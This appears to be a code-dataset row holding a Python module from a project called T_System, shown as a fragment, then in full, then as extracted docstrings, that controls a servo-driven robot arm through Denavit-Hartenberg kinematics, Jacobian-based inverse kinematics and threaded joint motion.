theta_dict[self.q[-1]] = self.q[-1]
temp = tf_matrix_first_to_last.evalf(subs=theta_dict, chop=True, maxn=4)
x = [np.array(temp[0, -1]).astype(np.float64)]
y = [np.array(temp[1, -1]).astype(np.float64)]
z = [np.array(temp[2, -1]).astype(np.float64)]
to_current_pos.append(np.array([x, y, z]))
return to_current_pos # to_current_pos is something like [[22], [23], [20]]
def __calc_jacobian_matrix(self):
"""Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix.
"""
tf_matrix_first_to_last = self.tf_matrices_list[-1]
self.jacobian_matrix = [diff(tf_matrix_first_to_last[:3, -1], self.q[i]).reshape(1, 3) for i in range(len(self.q))]
self.jacobian_matrix = Matrix(self.jacobian_matrix).T # .T returns the transpose of matrix.
def __inverse_kinematics(self, guess, target_point):
"""Method to calculate inverse kinematics of the Arm.
Args:
guess: The twist angle. Axis angle between consecutive two axes.
target_point (list): Target point's coordinates as X, Y, Z respectively.
Returns:
list: The angular position list of joints by the target point. (unit: radian)
"""
error = 1.0
tolerance = 0.05
# Initial Guess - Joint Angles
thetas = np.matrix(guess) # thetas is list which is contain all axes theta angles.
target_point = np.matrix(target_point) # X, Y, Z list to matrix for Target Position
# print(target_point.shape)
# Jacobian
self.__calc_jacobian_matrix()
tf_matrix_first_to_last = self.tf_matrices_list[-1]
error_grad = []
theta_dict = {}
lr = 0.2
while error > tolerance:
for i in range(len(np.array(thetas)[0])):
theta_dict[self.q[i]] = np.array(thetas)[0][i]
theta_dict[self.q[-1]] = self.q[-1]
calculated_target_point = np.matrix(self.get_coords_from_forward_kinematics(self.__forward_kinematics(np.array(thetas)[0])[-1]))
logger.debug(f'calculated target point is \n{calculated_target_point}')
diff_wanted_calculated = target_point - calculated_target_point
jacob_mat = np.matrix(self.jacobian_matrix.evalf(subs=theta_dict, chop=True, maxn=4)).astype(np.float64).T
logger.debug(f'jacobian matrix is\n{jacob_mat} \n\n diff is \n {diff_wanted_calculated}')
thetas = thetas + lr * (jacob_mat * diff_wanted_calculated.T)
# thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level.
prev_error = error
error = linalg.norm(diff_wanted_calculated)
if error > 10 * tolerance:
lr = 0.3
elif error < 10 * tolerance:
lr = 0.2
error_grad.append((error - prev_error))
# print(error)
return np.array(thetas)[0]
def path_plan(self, guess, target_list, time, acceleration):
Q_list = []
for target in target_list:
Q = self.__inverse_kinematics(guess, target)
predicted_coordinates = self.__forward_kinematics(Q)[-1]
logger.info(f'Target: {target} , Predicted: {predicted_coordinates}')
Q_list.append(Q)
guess = Q
# print(np.matrix(Q_list), np.matrix(Q_list).shape)
Q_matrix = np.matrix(Q_list)
theta_all, omega_all, acceleration_all = lpsb.trajectory_planner(Q_matrix, time, acceleration, 0.01)
return Q_list
def goto_position(self, polar_params=None, cartesian_coords=None):
"""Method to go to given position via position angles or coordinates of the Arm.
If the target position is given with angles, cartesian coordinates have been created,
else cartesian coordinates given the joints angles create.
Args:
polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count.
cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system.
"""
if cartesian_coords and polar_params:
self.__rotate_joints(polar_params)
elif polar_params:
self.__rotate_joints(polar_params)
cartesian_coords = self.get_coords_from_forward_kinematics(self.__forward_kinematics(polar_params["coords"])[-1])
elif cartesian_coords:
polar_params["coords"] = self.__inverse_kinematics([0, 0, 0], cartesian_coords)
self.__rotate_joints(polar_params)
else:
raise Exception('Going to position requires angle or coordinate!')
self.current_pos_as_theta = []
self.current_pos_as_coord = []
for coord in polar_params["coords"]:
self.current_pos_as_theta.append(coord)
for coord in cartesian_coords:
self.current_pos_as_coord.append(coord)
@dispatch(list)
def __rotate_joints(self, pos_thetas):
"""Method to rotate all joints according to given position theta angles.
Args:
pos_thetas (list): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(float(pos_thetas[joint.number - 1]),))
joint_threads.append(joint_thread)
joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
@dispatch(dict)
def __rotate_joints(self, polar_params):
"""Method to rotate all joints according to given position theta angles.
Args:
polar_params (dict): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(polar_params["coords"][joint.number - 1], int(polar_params["divide_counts"][joint.number - 1]), float(polar_params["delays"][joint.number - 1])))
joint_threads.append(joint_thread)
joint_thread.start()
# for joint_thread in joint_threads:
# joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
def rotate_joints(self, pan_params, tilt_params):
"""Method to rotate all joints according to given position theta angles.
Args:
pan_params (dict): Control parameters for pan rotation joints.
tilt_params (dict): Control parameters for tilt rotation joints.
"""
for joint in self.joints:
if joint.structure != 'constant':
thread_direction = None
if joint.rotation_type == "pan":
thread_direction = pan_params["direction"]
joint.motor_thread_stop = pan_params["stop"]
elif joint.rotation_type == "tilt":
thread_direction = tilt_params["direction"]
joint.motor_thread_stop = tilt_params["stop"]
if not joint.is_reverse:
joint.motor_thread_direction = not thread_direction
else:
joint.motor_thread_direction = thread_direction
if joint.motor_thread.is_alive():
pass
else:
if not joint.motor_thread_stop:
joint.motor_thread = threading.Thread(target=joint.motor.change_position_incregular, args=(lambda: joint.motor_thread_stop, lambda: joint.motor_thread_direction, 3))
joint.motor_thread.start()
@staticmethod
def __check_until_threads_ends(threads):
"""Method to check given threads recursively until all of them ends.
Args:
threads (list): Thread list that been checked.
"""
for thread in threads:
if thread.is_alive():
thread.join()
return True
def rotate_single_joint(self, joint_number, delta_angle, direction=None):
"""Method to move a single joint towards the given direction with the given variation.
Args:
joint_number (int): Number of one of arm's joints.
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if direction is None:
direction = False
if delta_angle <= 0:
direction = True
delta_angle = abs(delta_angle)
for i in range(len(self.joints)):
if self.joints[i].structure != "constant":
if self.joints[i].number == joint_number:
self.joints[i].change_angle_by(float(delta_angle), direction)
try:
self.current_pos_as_theta[i] = self.joints[i].current_angle
except IndexError:
logger.critical(f'current_pos_as_theta list of Arm has IndexError!')
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
def move_endpoint(self, axis, distance):
"""Method to move endpoint of the arm with the given axis and the distance.
Args:
axis (str): Number of one of arm's joints.
distance (int): Moving distance.
"""
current_pos_as_coord = self.current_pos_as_coord
cartesian_coords = {"x": current_pos_as_coord[0], "y": current_pos_as_coord[1], "z": current_pos_as_coord[2]}
cartesian_coords[axis] += distance
self.goto_position(cartesian_coords=current_pos_as_coord)
def get_current_positions(self):
"""Method to send current positions.
Returns:
dict: Response
"""
self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
return {"cartesian_coords": self.current_pos_as_coord, "polar_coords": self.current_pos_as_theta}
def ang_diff(self, theta1, theta2):
"""
Returns the difference between two angles in the range -pi to +pi
"""
return (theta1 - theta2 + np.pi) % (2 * np.pi) - np.pi
| #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: arm
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import numpy as np
import json
import threading
from numpy import linalg
from sympy import symbols, eye, Matrix, cos, sin, diff
from math import pi
from multipledispatch import dispatch
from t_system.motion.arm.modelisation import ArmModeler
from t_system.motion.motor import ServoMotor, ExtServoMotor
from t_system.motion import degree_to_radian, radian_to_degree
from t_system import T_SYSTEM_PATH
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class Joint:
"""Class to define the joint of N-axis motion arm.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, joint, use_ext_driver=None):
"""Initialization method of :class:`t_system.motion.arm.Joint` class.
Args:
joint (dict): The requested_data that is contain joint's properties from the config file.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.number = joint['joint_number']
self.is_reverse = joint['reverse']
self.motor = None
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = None
self.structure = joint['structure']
self.rotation_type = joint['rotation_type']
if self.structure == 'revolute':
self.max_q = joint['max_q']
self.min_q = joint['min_q']
elif self.structure == 'prismatic':
self.max_d = joint['max_d']
self.min_d = joint['min_d']
self.d = joint['init_d']
self.q = joint['init_q']
self.a = joint['a']
self.alpha = joint['alpha']
self.use_ext_driver = use_ext_driver
self.current_angle = degree_to_radian(self.q)
if self.is_reverse:
self.current_angle = pi - self.current_angle
if self.structure != 'constant':
if self.use_ext_driver:
self.motor = ExtServoMotor(joint['channel'])
self.motor.start(round(self.current_angle, 4))
else:
self.motor = ServoMotor(joint['motor_gpio_pin'])
self.motor.start(round(self.current_angle, 4))
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = threading.Thread(target=self.motor.change_position_incregular, args=(lambda: self.motor_thread_stop, lambda: self.motor_thread_direction))
logger.info(f'Joint{self.number} started successfully. As {self.structure}, in {self.rotation_type} rotation type, on {round(self.current_angle,4)} radian.')
@dispatch(float)
def move_to_angle(self, target_angle):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
"""
self.motor.directly_goto_position(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float)
def move_to_angle(self, target_angle, divide_count, delay):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
"""
self.motor.softly_goto_position(target_angle, divide_count, delay)
self.current_angle = target_angle
@dispatch(float, bool)
def change_angle_by(self, delta_angle, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float, bool)
def change_angle_by(self, delta_angle, divide_count, delay, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle, divide_count, delay)
self.current_angle = target_angle
def __calc_target_angle(self, delta_angle, direction):
"""Method to calculate target angle with the given variation angle value.
Args:
delta_angle (float): Calculated theta angle for going to object position. In radian type.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if self.is_reverse:
direction = not direction
if direction:
if self.current_angle - delta_angle < 0 or self.current_angle - delta_angle > pi:
return self.current_angle
return self.current_angle - delta_angle # this mines (-) for cw.
else:
if self.current_angle + delta_angle < 0 or self.current_angle + delta_angle > pi:
return self.current_angle
return self.current_angle + delta_angle
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor.
"""
self.motor.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the collimator's servo motor.
"""
self.motor.gpio_cleanup()
class Arm:
"""Class to define a N-axis arm for motion ability of tracking system.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, arm_name="Junior", use_ext_driver=False):
"""Initialization method of :class:`t_system.motion.arm.Arm` class.
Args:
arm_name (str): Name of the arm. From config file or user choice.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.name = arm_name
self.expansion_name = f'{self.name}-Expansion'
self.__is_expanded = False
self.joints = []
self.config_file = f'{T_SYSTEM_PATH}/motion/arm/config.json'
self.joint_count = 0
self.alpha = None
self.a = None
self.q = None
self.d = None
self.dh_params = {}
self.tf_matrices_list = []
self.jacobian_matrix = None
self.current_pos_as_coord = []
self.current_pos_as_theta = []
with open(self.config_file) as conf_file:
arm_configs = json.load(conf_file)[self.name] # config file returns the arms.
self.use_ext_driver = use_ext_driver
if self.use_ext_driver:
self.use_ext_driver = arm_configs["use_ext_driver"]
self.__set_joints(arm_configs["joints"])
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
logger.info(f'{self.name} arm started successfully.')
def expand(self, current_angles=None):
"""Method to expand arm with using target_locker of t_system's vision.
Args:
current_angles (list): Current angles of the arm's expanded joints.
"""
if not self.__is_expanded:
try:
self.__is_expanded = True
self.joints.pop(-1)
with open(self.config_file) as conf_file:
expansion_joint_configs = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for (i, joint_conf) in enumerate(expansion_joint_configs):
joint_conf['joint_number'] = len(self.joints) + 1
if current_angles and (joint_conf['structure'] != "constant"):
joint_conf['init_q'] = radian_to_degree(current_angles[i])
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
self.__is_expanded = False
def revert_the_expand(self):
"""Method to revert back the expansion.
"""
released_angles = []
if self.__is_expanded:
try:
self.__is_expanded = False
with open(self.config_file) as conf_file:
expansion_joints = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for joint in expansion_joints:
if self.joints[-1].structure != "constant":
self.joints[-1].stop()
self.joints[-1].gpio_cleanup()
released_angles.append(self.current_pos_as_theta[-1])
del self.current_pos_as_theta[-1]
del self.joints[-1]
with open(self.config_file) as conf_file:
arm = json.load(conf_file)[self.name] # config file returns the arms.
self.joints.append(Joint(arm["joints"][-1], self.use_ext_driver))
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
released_angles = [None, None]
self.__is_expanded = True
return released_angles
def is_expanded(self):
"""Method to return expansion flag of the arm.
"""
return self.__is_expanded
def __set_joints(self, joint_configs):
"""Method to setting joints with D-H parameters.
Args:
joint_configs (list): The joint list from the config file.
"""
self.joint_count = len(joint_configs)
for joint_conf in joint_configs:
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.__prepare_dh_params()
def __pull_model(self):
"""Method to pull arm D-H model from database via an ArmModeller instance.
"""
model = ArmModeler().get(self.name)
if model:
logger.debug("model creating...")
self.alpha = model["alpha"]
self.a = model["a"]
self.q = model["q"]
self.d = model["d"]
self.dh_params = model["dh_params"]
self.tf_matrices_list = model["transform_matrices"]
self.jacobian_matrix = model["jacobian_matrix"]
else:
ArmModeler().create(self.name)
self.__pull_model()
def __prepare_dh_params(self):
"""Method to preparing D-H parameters of Arm.
"""
self.alpha = symbols('alpha0:' + str(self.joint_count))
self.a = symbols('a0:' + str(self.joint_count))
self.q = symbols('q1:' + str(self.joint_count + 1))
self.d = symbols('d1:' + str(self.joint_count + 1))
def __set_dh_params(self, joints):
"""Method to setting joint's D-H parameters.
Args:
joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart.
"""
self.dh_params = {}
for i in range(len(joints)):
self.dh_params[self.alpha[i]] = joints[i].alpha
self.dh_params[self.a[i]] = joints[i].a
if joints[i].structure == 'revolute':
self.dh_params[self.q[i]] = self.q[i]
self.dh_params[self.d[i]] = joints[i].d
elif joints[i].structure == 'prismatic':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = self.d[i]
elif joints[i].structure == 'constant':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = joints[i].d
self.__set_transform_matrices()
def show_dh_params(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'DH Parameters are: {self.dh_params}')
def __set_transform_matrices(self):
"""Method to setting D-H transform matrices.
"""
self.tf_matrices_list = []
transform_matrix = eye(4) # creates a unit matrix via passing argument.
for i in range(self.joint_count):
transform_matrix = transform_matrix * self.__create_tf_matrix(self.alpha[i], self.a[i], self.d[i], self.q[i]).subs(self.dh_params)
self.tf_matrices_list.append(transform_matrix)
def show_transform_matrices(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'Transform Matrices are: {self.tf_matrices_list}')
@staticmethod
def __create_tf_matrix(alpha, a, d, q):
"""Method to calculate transform matrix of Denavit-Hartenberg Method.
Args:
alpha: The twist angle. Axis angle between consecutive two axes.
a: The limb length between consecutive two axis.
d: link offset. The displacement along the same axis.
q: The rotation theta angle about the joint axis.
Returns:
object: The Denavit-Hartenberg transform matrix object.
"""
tf_matrix = Matrix([[cos(q), -sin(q), 0., a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0., 0., 0., 1.]])
return tf_matrix
@staticmethod
def get_coords_from_forward_kinematics(forward_kinematics_result):
"""Method to get cartesian coords from calculated forward kinematics result of the Arm.
Args:
forward_kinematics_result (list): result of the forward kinematics calculation.
Returns:
list: The cartesian coordinate position of Arm's farthest point as millimeter list.
"""
return [current_pos[0] for current_pos in forward_kinematics_result]
def __forward_kinematics(self, theta_list):
"""Method to calculate forward kinematics of the Arm.
Args:
theta_list (list): The list of current joints angles.
Returns:
list: The cartesian coordinate position of Arm's farthest point as theta list.
"""
to_current_pos = []
theta_dict = {}
tf_matrix_first_to_last = self.tf_matrices_list[-1]
for i in range(len(theta_list)):
theta_dict[self.q[i]] = theta_list[i]
theta_dict[self.q[-1]] = self.q[-1]
temp = tf_matrix_first_to_last.evalf(subs=theta_dict, chop=True, maxn=4)
x = [np.array(temp[0, -1]).astype(np.float64)]
y = [np.array(temp[1, -1]).astype(np.float64)]
z = [np.array(temp[2, -1]).astype(np.float64)]
to_current_pos.append(np.array([x, y, z]))
return to_current_pos # to_current_pos is something like [[22], [23], [20]]
def __calc_jacobian_matrix(self):
"""Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix.
"""
tf_matrix_first_to_last = self.tf_matrices_list[-1]
self.jacobian_matrix = [diff(tf_matrix_first_to_last[:3, -1], self.q[i]).reshape(1, 3) for i in range(len(self.q))]
self.jacobian_matrix = Matrix(self.jacobian_matrix).T # .T returns the transpose of matrix.
def __inverse_kinematics(self, guess, target_point):
"""Method to calculate inverse kinematics of the Arm.
Args:
guess: The twist angle. Axis angle between consecutive two axes.
target_point (list): Target point's coordinates as X, Y, Z respectively.
Returns:
list: The angular position list of joints by the target point. (unit: radian)
"""
error = 1.0
tolerance = 0.05
# Initial Guess - Joint Angles
thetas = np.matrix(guess) # thetas is list which is contain all axes theta angles.
target_point = np.matrix(target_point) # X, Y, Z list to matrix for Target Position
# print(target_point.shape)
# Jacobian
self.__calc_jacobian_matrix()
tf_matrix_first_to_last = self.tf_matrices_list[-1]
error_grad = []
theta_dict = {}
lr = 0.2
while error > tolerance:
for i in range(len(np.array(thetas)[0])):
theta_dict[self.q[i]] = np.array(thetas)[0][i]
theta_dict[self.q[-1]] = self.q[-1]
calculated_target_point = np.matrix(self.get_coords_from_forward_kinematics(self.__forward_kinematics(np.array(thetas)[0])[-1]))
logger.debug(f'calculated target point is \n{calculated_target_point}')
diff_wanted_calculated = target_point - calculated_target_point
jacob_mat = np.matrix(self.jacobian_matrix.evalf(subs=theta_dict, chop=True, maxn=4)).astype(np.float64).T
logger.debug(f'jacobian matrix is\n{jacob_mat} \n\n diff is \n {diff_wanted_calculated}')
thetas = thetas + lr * (jacob_mat * diff_wanted_calculated.T)
# thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level.
prev_error = error
error = linalg.norm(diff_wanted_calculated)
if error > 10 * tolerance:
lr = 0.3
elif error < 10 * tolerance:
lr = 0.2
error_grad.append((error - prev_error))
# print(error)
return np.array(thetas)[0]
def path_plan(self, guess, target_list, time, acceleration):
Q_list = []
for target in target_list:
Q = self.__inverse_kinematics(guess, target)
predicted_coordinates = self.__forward_kinematics(Q)[-1]
logger.info(f'Target: {target} , Predicted: {predicted_coordinates}')
Q_list.append(Q)
guess = Q
# print(np.matrix(Q_list), np.matrix(Q_list).shape)
Q_matrix = np.matrix(Q_list)
theta_all, omega_all, acceleration_all = lpsb.trajectory_planner(Q_matrix, time, acceleration, 0.01)
return Q_list
def goto_position(self, polar_params=None, cartesian_coords=None):
"""Method to go to given position via position angles or coordinates of the Arm.
If the target position is given with angles, cartesian coordinates have been created,
else cartesian coordinates given the joints angles create.
Args:
polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count.
cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system.
"""
if cartesian_coords and polar_params:
self.__rotate_joints(polar_params)
elif polar_params:
self.__rotate_joints(polar_params)
cartesian_coords = self.get_coords_from_forward_kinematics(self.__forward_kinematics(polar_params["coords"])[-1])
elif cartesian_coords:
polar_params["coords"] = self.__inverse_kinematics([0, 0, 0], cartesian_coords)
self.__rotate_joints(polar_params)
else:
raise Exception('Going to position requires angle or coordinate!')
self.current_pos_as_theta = []
self.current_pos_as_coord = []
for coord in polar_params["coords"]:
self.current_pos_as_theta.append(coord)
for coord in cartesian_coords:
self.current_pos_as_coord.append(coord)
@dispatch(list)
def __rotate_joints(self, pos_thetas):
"""Method to rotate all joints according to given position theta angles.
Args:
pos_thetas (list): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(float(pos_thetas[joint.number - 1]),))
joint_threads.append(joint_thread)
joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
@dispatch(dict)
def __rotate_joints(self, polar_params):
"""Method to rotate all joints according to given position theta angles.
Args:
polar_params (dict): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(polar_params["coords"][joint.number - 1], int(polar_params["divide_counts"][joint.number - 1]), float(polar_params["delays"][joint.number - 1])))
joint_threads.append(joint_thread)
joint_thread.start()
# for joint_thread in joint_threads:
# joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
def rotate_joints(self, pan_params, tilt_params):
"""Method to rotate all joints according to given position theta angles.
Args:
pan_params (dict): Control parameters for pan rotation joints.
tilt_params (dict): Control parameters for tilt rotation joints.
"""
for joint in self.joints:
if joint.structure != 'constant':
thread_direction = None
if joint.rotation_type == "pan":
thread_direction = pan_params["direction"]
joint.motor_thread_stop = pan_params["stop"]
elif joint.rotation_type == "tilt":
thread_direction = tilt_params["direction"]
joint.motor_thread_stop = tilt_params["stop"]
if not joint.is_reverse:
joint.motor_thread_direction = not thread_direction
else:
joint.motor_thread_direction = thread_direction
if joint.motor_thread.is_alive():
pass
else:
if not joint.motor_thread_stop:
joint.motor_thread = threading.Thread(target=joint.motor.change_position_incregular, args=(lambda: joint.motor_thread_stop, lambda: joint.motor_thread_direction, 3))
joint.motor_thread.start()
@staticmethod
def __check_until_threads_ends(threads):
"""Method to check given threads recursively until all of them ends.
Args:
threads (list): Thread list that been checked.
"""
for thread in threads:
if thread.is_alive():
thread.join()
return True
def rotate_single_joint(self, joint_number, delta_angle, direction=None):
"""Method to move a single joint towards the given direction with the given variation.
Args:
joint_number (int): Number of one of arm's joints.
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if direction is None:
direction = False
if delta_angle <= 0:
direction = True
delta_angle = abs(delta_angle)
for i in range(len(self.joints)):
if self.joints[i].structure != "constant":
if self.joints[i].number == joint_number:
self.joints[i].change_angle_by(float(delta_angle), direction)
try:
self.current_pos_as_theta[i] = self.joints[i].current_angle
except IndexError:
logger.critical(f'current_pos_as_theta list of Arm has IndexError!')
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
def move_endpoint(self, axis, distance):
"""Method to move endpoint of the arm with the given axis and the distance.
Args:
axis (str): Number of one of arm's joints.
distance (int): Moving distance.
"""
current_pos_as_coord = self.current_pos_as_coord
cartesian_coords = {"x": current_pos_as_coord[0], "y": current_pos_as_coord[1], "z": current_pos_as_coord[2]}
cartesian_coords[axis] += distance
self.goto_position(cartesian_coords=current_pos_as_coord)
def get_current_positions(self):
"""Method to send current positions.
Returns:
dict: Response
"""
self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
return {"cartesian_coords": self.current_pos_as_coord, "polar_coords": self.current_pos_as_theta}
def ang_diff(self, theta1, theta2):
"""
Returns the difference between two angles in the range -pi to +pi
"""
return (theta1 - theta2 + np.pi) % (2 * np.pi) - np.pi | en | 0.740492 | #!/usr/bin/python3 # -*- coding: utf-8 -*- .. module:: arm :platform: Unix :synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability. .. moduleauthor:: <NAME> <<EMAIL>> Class to define the joint of N-axis motion arm. This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move` for the provide move of servo motor. Initialization method of :class:`t_system.motion.arm.Joint` class. Args: joint (dict): The requested_data that is contain joint's properties from the config file. use_ext_driver (bool): The flag of external PWM driver activation. The top-level method to provide servo motors moving. Args: target_angle (float): The target angle of servo motors. In radian Unit. The top-level method to provide servo motors moving. Args: target_angle (float): The target angle of servo motors. In radian Unit. divide_count (int): The count that specify motor how many steps will use. delay (float): delay time between motor steps. The top-level method to provide servo motors moving. Args: delta_angle (float): Angle to rotate. In degree. direction (bool): Rotate direction. True means CW, otherwise CCW. The top-level method to provide servo motors moving. Args: delta_angle (float): Angle to rotate. In degree. divide_count (int): The count that specify motor how many steps will use. delay (float): delay time between motor steps. direction (bool): Rotate direction. True means CW, otherwise CCW. Method to calculate target angle with the given variation angle value. Args: delta_angle (float): Calculated theta angle for going to object position. In radian type. direction (bool): Rotate direction. True means CW, otherwise CCW. # this mines (-) for cw. Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor. Method to provide clean the GPIO pins that are reserved for the collimator's servo motor. Class to define a N-axis arm for motion ability of tracking system. This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move` for the provide move of servo motor. Initialization method of :class:`t_system.motion.arm.Arm` class. Args: arm_name (str): Name of the arm. From config file or user choice. use_ext_driver (bool): The flag of external PWM driver activation. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to expand arm with using target_locker of t_system's vision. Args: current_angles (list): Current angles of the arm's expanded joints. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to revert back the expansion. # config file returns the arms. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to return expansion flag of the arm. Method to setting joints with D-H parameters. Args: joint_configs (list): The joint list from the config file. Method to pull arm D-H model from database via an ArmModeller instance. Method to preparing D-H parameters of Arm. Method to setting joint's D-H parameters. Args: joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart. 
Method to getting D-H parameters of joints of Arm as string message. Method to setting D-H transform matrices. # creates a unit matrix via passing argument. Method to getting D-H parameters of joints of Arm as string message. Method to calculate transform matrix of Denavit-Hartenberg Method. Args: alpha: The twist angle. Axis angle between consecutive two axes. a: The limb length between consecutive two axis. d: link offset. The displacement along the same axis. q: The rotation theta angle about the joint axis. Returns: object: The Denavit-Hartenberg transform matrix object. Method to get cartesian coords from calculated forward kinematics result of the Arm. Args: forward_kinematics_result (list): result of the forward kinematics calculation. Returns: list: The cartesian coordinate position of Arm's farthest point as millimeter list. Method to calculate forward kinematics of the Arm. Args: theta_list (list): The list of current joints angles. Returns: list: The cartesian coordinate position of Arm's farthest point as theta list. # to_current_pos is something like [[22], [23], [20]] Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix. # .T returns the transpose of matrix. Method to calculate inverse kinematics of the Arm. Args: guess: The twist angle. Axis angle between consecutive two axes. target_point (list): Target point's coordinates as X, Y, Z respectively. Returns: list: The angular position list of joints by the target point. (unit: radian) # Initial Guess - Joint Angles # thetas is list which is contain all axes theta angles. # X, Y, Z list to matrix for Target Position # print(target_point.shape) # Jacobian # thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level. # print(error) # print(np.matrix(Q_list), np.matrix(Q_list).shape) Method to go to given position via position angles or coordinates of the Arm. If the target position is given with angles, cartesian coordinates have been created, else cartesian coordinates given the joints angles create. Args: polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count. cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system. Method to rotate all joints according to given position theta angles. Args: pos_thetas (list): Angular position list to go. List length equals to joint count. Method to rotate all joints according to given position theta angles. Args: polar_params (dict): Angular position list to go. List length equals to joint count. # for joint_thread in joint_threads: # joint_thread.start() Method to rotate all joints according to given position theta angles. Args: pan_params (dict): Control parameters for pan rotation joints. tilt_params (dict): Control parameters for tilt rotation joints. Method to check given threads recursively until all of them ends. Args: 